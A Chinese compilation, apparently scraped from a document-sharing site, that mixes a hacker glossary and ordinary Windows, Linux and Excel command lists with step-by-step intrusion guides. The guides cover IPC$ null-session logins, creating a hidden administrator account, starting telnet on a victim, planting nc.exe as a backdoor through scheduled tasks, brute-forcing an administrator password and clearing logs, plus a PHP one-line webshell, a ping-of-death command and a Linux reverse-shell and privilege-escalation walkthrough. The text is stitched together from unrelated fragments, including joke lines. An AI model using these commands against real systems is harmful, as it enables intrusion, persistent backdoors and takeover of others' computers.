黑客术语大全 1,肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。 2,木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。 3,网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。 4,挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。 5,后门:这是一种形象的比喻,**者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是**者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是**者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。 通常大多数的特洛伊木马(Trojan Horse)程序都可以被**者用语制作后门(BackDoor)6,rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。 9,IPC$:是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 10.弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码) 11.默认共享:默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬 盘的共享,因为加了"$"符号,所以看不到共享的托手图表,也成为隐藏共享。 12.shell:指的是一种命令指行环境,比如我们按下键盘上的“开始键+R”时出现“运行”对 话框,在里面输入“cmd”会出现一个用于执行命令的黑窗口,这个就是WINDOWS的Shell 执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell 13.WebShell:WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执 行环境,也可以将其称做是一种网页后门。黑客在**了一个网站后,通常会将这些asp 或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp 或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell 有海阳ASP木马,Phpspy,c99shell等 14.溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有
CMD(网络命令大全) CMD(网络命令大全) netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例:netstat -p tcqip 查看某协议使用情况(查看tcpip 协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Supporttools文件夹内) kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Supporttools文件夹内) net user 用户名密码add 建立用户 net user guest activeyes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如net start telnet, net start schedule) net stop 服务名停止某服务 net time 目标ip 查看对方时间
黑客常用CMD命令大全 net user heibai lovechina /add 加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add 把他加入Administrator组 net start telnet 开对方的TELNET服务 net use z:\127.0.0.1c$ 映射对方的C盘 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net user guest /active:yes 将Guest用户激活 net user guest lovechina 把guest的密码改为lovechina net user 用户名/delete 删掉用户 net user guest/time:m-f,08:00-17:00 表示guest用户登录时间为周一至周五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00. net user guest/time:all表示没有时间限制. net user guest/time 表示guest用户永远不能登录. 但是只能限制登陆时间,不是上网时间 net time \\127.0.0.1 得到对方的时间, get c:\index.htm d:\ 上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到 127.0.0.1的C盘 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加参数 /yes可取消确认信息net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置
cmd是command的缩写.即命令行。 虽然随着计算机产业的发展,Windows 操作系统的应用越来越广泛,DOS 面临着被淘汰的命 运,但是因为它运行安全、稳定,有的用户还在使用,所以一般Windows 的各种版本都与其兼容,用户可以在Windows 系统下运行DOS,中文版Windows XP 中的命令提示符进一步提高了与DOS 下操作命令的兼容性,用户可以在命令提示符直接输入中文调用文件。 在9x系统下输入command就可以打开命令行.而在NT系统上可以输入cmd来打开,在 windows2003后被cmd替代,利用CMD命令查询系统的信息或者是判断网络的好坏。 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CMD命令锦集 1. gpedit.msc-----组策略 2. sndrec32-------录音机 3. Nslookup-------IP地址侦测器,是一个监测网络中DNS 服务器是否能正确实现域名解析的命令行工具。它在Windows NT/2000/XP 中均可使用, 但在Windows 98 中却没有集成这一个工具。 4. explorer-------打开资源管理器 5. logoff---------注销命令 6. shutdown-------60秒倒计时关机命令 7. lusrmgr.msc----本机用户和组 8. services.msc---本地服务设置 9. oobe/msoobe /a----检查XP是否激活 10. notepad--------打开记事本 11. cleanmgr-------垃圾整理 12. net start messenger----开始信使服务 13. compmgmt.msc---计算机管理 14. net stop messenger-----停止信使服务 15. conf-----------启动netmeeting 16. dvdplay--------DVD播放器 17. charmap--------启动字符映射表 18. diskmgmt.msc---磁盘管理实用程序 19. calc-----------启动计算器 20. dfrg.msc-------磁盘碎片整理程序 21. chkdsk.exe-----Chkdsk磁盘检查 22. devmgmt.msc--- 设备管理器 23. regsvr32 /u *.dll----停止dll文件运行 24. drwtsn32------ 系统医生 25. rononce -p----15秒关机 26. dxdiag---------检查DirectX信息 27. regedt32-------注册表编辑器 28. Msconfig.exe---系统配置实用程序 29. rsop.msc-------组策略结果集 30. mem.exe--------显示内存使用情况
ls显示文件或目录 -l 列出文件详细信息l(list) -a 列出当前目录下所有文件及目录,包括隐藏的a(all) mkdir 创建目录 -p 创建目录,若无父目录,则创建p(parent) cd 切换目录 touch 创建空文件 echo 创建带有内容的文件。 cat 查看文件内容 cp 拷贝 mv 移动或重命名 rm 删除文件 -r 递归删除,可删除子目录及文件 -f 强制删除 find 在文件系统中搜索某文件 wc 统计文本中行数、字数、字符数 grep 在文本文件中查找某个字符串 rmdir 删除空目录 tree 树形结构显示目录,需要安装tree包 pwd 显示当前目录 ln 创建链接文件 more、less 分页显示文本文件内容 head、tail 显示文件头、尾内容 ctrl+alt+F1 命令行全屏模式 系统管理命令 stat 显示指定文件的详细信息,比ls更详细
who 显示在线登陆用户 whoami 显示当前操作用户 hostname 显示主机名 uname 显示系统信息 top 动态显示当前耗费资源最多进程信息 ps 显示瞬间进程状态 ps -aux du 查看目录大小 du -h /home带有单位显示目录信息 df 查看磁盘大小 df -h 带有单位显示磁盘信息 ifconfig 查看网络情况 ping 测试网络连通 netstat 显示网络状态信息 man 命令不会用了,找男人如:man ls clear 清屏 alias 对命令重命名如:alias showmeit="ps -aux" ,另外解除使用unaliax showmeit kill 杀死进程,可以先用ps 或 top命令查看进程的id,然后再用kill命令杀死进程。 打包压缩相关命令 gzip: bzip2: tar: 打包压缩 -c 归档文件 -x 压缩文件 -z gzip压缩文件 -j bzip2压缩文件 -v 显示压缩或解压缩过程 v(view) -f 使用档名
计算机命令大全 黑客常用命令大全 net user heibai lovechina /add --------加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add --------把他加入Administrator组 net start telnet --------开对方的TELNET服务 net use z:\127.0.0.1c$ --------映射对方的C盘 net user guest /active:yes --------将Guest用户激活 net user guest lovechina --------把guest的密码改为lovechina net user --------查看所有用户列表 net user --------用户名/delete 删掉 net time \\127.0.0.1-------- 得到对方的时间, get c:\index.htm d:\ --------上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm --------本地C盘下的index.htm复制到127.0.0.1的C 盘 NET VIEW --------显示域列表、计算机列表 计算机运行命令全集 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板winmsd-----系统信息 wiaacmgr-------扫描仪和照相机向导 winchat--------XP自带局域网聊天 mem.exe--------显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2-------简易widnows media player mspaint--------画图板 mstsc----------远程桌面连接 net use \\ip\ipc$ " /user:" " --------建立IPC空链接 net use \\ip\ipc$ "密码"/user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码"/user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ --------登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del --------删除IPC链接 net use h: /del --------删除映射对方到本地的为H:的映射 net user 用户名密码/add --------建立用户 net user guest /active:yes --------激活guest用户 net user --------查看有哪些用户 net user 帐户名-------- 查看帐户的属性 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,
黑客常用的远程控制命令 1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add ---------------------- 这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z 盘. net use z:\\127.0.0.1\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes ---------------------- 这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! net user guest lovechina net命令果然强大啊! 2:at 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 那么需要用AT命令,这里假设你已经登陆了那个服务器。 你首先要得到对方的时间, net time \\127.0.0.1 将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 at \\127.0.0.1 12:3 nc.exe 严志梁 这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上. 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 3:telnet 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 4:FTP 它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个https://www.doczj.com/doc/5917847310.html,,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.
Windows常用快捷键
? ? ? ?Micsoft Excel常用快捷键 ?在工作表中移动和滚动 ?[命令] [作用] ?箭头键向上、下、左或右移动单元格 ?CTRL+ 箭头键移动到当前数据区域的边缘 ?HOME 移动到行首 ?CTRL+HOME 移动到工作表的开头 ?CTRL+END 移动到工作表的最后一个单元格 ?PAGE DOWN 向下移动一屏 ?PAGE UP 向上移动一屏 ?ALT+PAGE DOWN 向右移动一屏 ?ALT+PAGE UP 向左移动一屏 ?CTRL+PAGE DOWN 移动到工作簿中下一个工作表?CTRL+PAGE UP 移动到工作簿中前一个工作表 ?CTRL+F6 或 CTRL+TAB 移动到下一工作簿或窗口?CTRL+SHIFT+F6 移动到前一工作簿或窗口 ?F6 移动到已拆分工作簿中的下一个窗格 ?SHIFT+F6 移动到被拆分的工作簿中的上一个窗格?CTRL+BACKSPACE 滚动并显示活动单元格
?SHIFT+F5 显示“查找”对话框 ?SHIFT+F4 重复上一次“查找”操作 ?TAB 在保护工作表中的非锁定单元格之间移动 ?处于END模式时在工作表中移动 ?[命令] [作用] ?END 打开或关闭 END 模式 ?END+箭头键在一行或列内以数据块为单位移动 ?END+HOME 移动到工作表的最后一个单元格. ?处于“滚动锁定”模式时在工作表中移动 ?SCROLL LOCK 打开或关闭滚动锁定 ?HOME 移动到窗口中左上角处的单元格 ?END 移动到窗口中右下角处的单元格 ?上箭头键或下箭头键向上或向下滚动一行 ?左箭头键或右箭头键向左或向右滚动一列 ?用于预览和打印文档 ?[命令] [作用] ?CTRL+P 显示“打印”对话框 ?在打印预览中时 ?[命令] [作用] ?箭头键当放大显示时,在文档中移动 ?PAGE UP 当缩小显示时,在文档中每次滚动一页 ?CTRL+上箭头键当缩小显示时,滚动到第一页 ?CTRL+下箭头键当缩小显示时,滚动到最后一页 ?用于工作表、图表和宏 ?[命令] [作用] ?SHIFT+F11 插入新工作表 ?F11 或 ALT+F1 创建使用当前区域的图表 ?ALT+F8 显示“宏”对话框 ?ALT+F11 显示“Visual Basic 编辑器” ?CTRL+F11 插入 Microsoft Excel 4.0 宏工作表 ?CTRL+PAGE DOWN 移动到工作簿中的下一个工作表 ?CTRL+PAGE UP 移动到工作簿中的上一个工作表 ?SHIFT+CTRL+PAGE DOWN 选择工作簿中当前和下一个工作表SHIFT+CTRL+PAGE UP 选择当前工作簿或上一个工作簿
模拟黑客攻击 一、实验环境 本例以攻击一台文件服务器为例,演示通常的攻击方法和思路。该文件服务器默认安装了Windows Server 2003,启动了Windows防火墙但是允许文件共享。其余设置全为默认安装设置,并安装了所有补丁。 二、需求描述 扫描目标主机 获得管理员权限 安装后门 清除攻击记录 三、实验拓扑 四、实验步骤 扫描目标主机 1.使用扫描软件扫描目标计算机,确认开放的端口,判断操作系统的类型。
2.扫描软件推荐使用X-Scan或流光。 获得管理权限 1.根据扫描结果,尝试暴力破解管理员账户和密码。 2.破解后自动生成报告。
入侵目标计算机 1.使用管理员的账号建立IPC链接,命令为“net use \\19 2.168.10.11 123456 /user:administrator”. 使用sc命令获取目标计算机的所有服务列表,并保存在本地。命令为“sc\\192.168.10.11 query type= service state= all >c:\1.txt”(注意:两个“=”前无空格,“=”后有空格)。“>c:\1.txt”表示将输出结果保存在本地C盘的1.txt文件内。
2.打开1.txt文件,找到telnet,确认服务的状态,telnet服务默认为禁用状态。如果知道 telnet服务的服务名称,可直接使用命令行查看,命令为“sc \\192.168.10.11 qc tlntsvr”. 3.去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\192.168.10.11 config tlntsvr start= auto”。然后启用telnet服务,命令为“sc \\192.168.10.11 start tlntsvr”.
Dos常用命令一: net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
开始→运行(cmd)命令大全会用的都说好不会用的看都看不懂 开始→运行(cmd)命令大全 gpedit.msc-----组策略 sndrec32-------录音机 Nslookup-------IP地址侦测器 explorer-------打开资源管理器 logoff---------注销命令 tsshutdn-------60秒倒计时关机命令 lusrmgr.msc----本机用户和组 services.msc---本地服务设置 oobe/msoobe /a----检查XP是否激活 notepad--------打开记事本 cleanmgr-------垃圾整理 net start messenger----开始信使服务 compmgmt.msc---计算机管理 net stop messenger-----停止信使服务 conf-----------启动netmeeting dvdplay--------DVD播放器 charmap--------启动字符映射表 diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器 dfrg.msc-------磁盘碎片整理程序 chkdsk.exe-----Chkdsk磁盘检查devmgmt.msc--- 设备管理器 regsvr32 /u *.dll----停止dll文件运行drwtsn32------ 系统医生 rononce -p ----15秒关机dxdiag---------检查DirectX信息 regedt32-------注册表编辑器Msconfig.exe---系 统配置实用程序 rsop.msc-------组策略结果集 mem.exe--------显示内存使用情况 regedit.exe----注册表 winchat--------XP 自带局域网聊天 progman--------程序管理器 winmsd---------系统信息 perfmon.msc----计算机性能监测程序 winver---------检查Windows版本 sfc /scannow-----扫描错误并复原 winipcfg-------IP 配置 taskmgr-----任务管理器(2000/xp/2003)command--------cmd fsmgmt.msc 共享文件夹 netstat -an----查看端口 osk 屏幕键盘install.asp----修改注册网页 eventvwr.msc 时间查看器 secpol.msc 本地安全设置 services.msc 服务 accwiz.exe > 辅助工具向导 acsetups.exe > acs setup dcom server executable actmovie.exe > 直接显示安装工具 append.exe > 允许程序打开制定目录中的数据 arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表 at.exe > 计划运行任务 atmadm.exe > 调用管理器统计
黑客DOS命令或其它命令入侵他人电脑的具体步骤.txt会计说:“你晚点来领工资吧,我这没零钱。”你看得出我擦了粉吗?虽然你身上喷了古龙水,但我还是能隐约闻到一股人渣味儿。既宅又腐,前途未卜。既宅又腐,前途未卜。你被打胎后是怎么从垃圾桶里逃出来的?史上最神秘的部门:有关部门。不可否认,马赛克是这个世纪阻碍人类裸体艺术进步最大的障碍!黑客DOS命令或其它命令入侵他人电脑的具体步骤?_百度知道百度首页 | 百度知道 | 登录 新闻网页贴吧知道 MP3 图片视频百科 帮助设置 百度知道 > 电脑/网络 > 反病毒相关问题添加到搜藏已解决 黑客DOS命令或其它命令入侵他人电脑的具体步骤? 悬赏分:10 - 解决时间:2008-2-28 11:48 哪位大侠指教下~ 本人只会用一些软件和命令入侵,听说黑客不用工具的,非常想了解一个具体的步骤和方法.. 提问者: DYX211 - 见习魔法师二级最佳答案 IPC$入侵 一唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘
说起cmd大家都很熟悉吧很有用哦这里我为大家接扫常见的命令 dos命令[只列出我们工作中可能要用到的] cd\ '返回到根目录 cd.. '返回到上一级目录 1、cd 显示当前目录名或改变当前目录。 2、dir 显示目录中的文件和子目录列表。 3、md 创建目录。 4、del 删除一或数个文件。 5、chkdsk 检查磁盘并显示状态报告。 6、cacls 显示或者修改文件的访问控制表(ACL) 7、copy 将一份或多份文件复制到另一个位置。 8、date 修改日期 9、format 格式化磁盘 10、type 显示文本文件的内容。 11、move 移动文件并重命名文件和目录。 12、expand 展开一个或多个压缩文件。 13、ren 重命名文件。 14、attrib 显示或更改文件属性。 15、time 显示或设置系统时间。 16、at at命令安排在特定日期和时间运行命令和程序。要使用AT 命令,计划服务必须已在运行中。 17、net [user],[time],[use] 多,自己去查 18、netstat 显示协议统计和当前tcp/ip连接 19、nbtstat 基于NBT(net bios over tcp/ip)的协议统计和当前tcp/ip连接 20、route 操作和查看网络路由表 21、ping 就不说了,大家都熟悉吧 22、nslookup 域名查找 23、edit 命令行下的文本编辑器 24、netsh强大的命令行下修改tcp/ip配置的工具 25、fdisk 相信现在用的人比较少了,不过在没有其他工具的情况,他还是有用的 更多: attrib 设置文件属性 ctty 改变控制设备 defrag 磁盘碎片整理 doskey 调用和建立DOS宏命令 debug 程序调试命令
黑客linux入侵常用命令汇总 写个php一句话后门上去: [jobcruit@wa64-054 rankup_log]$ echo -e "" >rankuplog_time.php [jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php 1.linux的想着先跨站。shell浏览目标站不行,命令行下输入ls -la /users/ 2.溢出提权 # python –c ‘impotr pty;pty.spawn(“/bin/sh”); 来得到交互的Shell,一般的系统都默认安装python 输入id bash-3.2$ id uid=529(zeicom) gid=525(zeicom) groups=525(zeicom) bash-3.2$ 这里uid=529(zeicom)还不是root权限, 输入uname –r 返回:2.6.18-164.11.1.el5PAE Linux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出 找对应的exp, 这里地址整理很齐全可以这里下 http://tools.90sec/ http://sebug/paper/linux_exp/ https://www.doczj.com/doc/5917847310.html,/bitch/exp/ http://exploit-db/search/ 命令输入pwd,这个命令是显示当前目录, 先看能不能编译 gcc -help 当前目录就是shell的目录,我在shell上传2.c 反弹shell 到外网自己机器的12345端口 上外网服务器本地监听nc -lvvp 12345 一般都能得到一个apache交互的shell 有时候又不行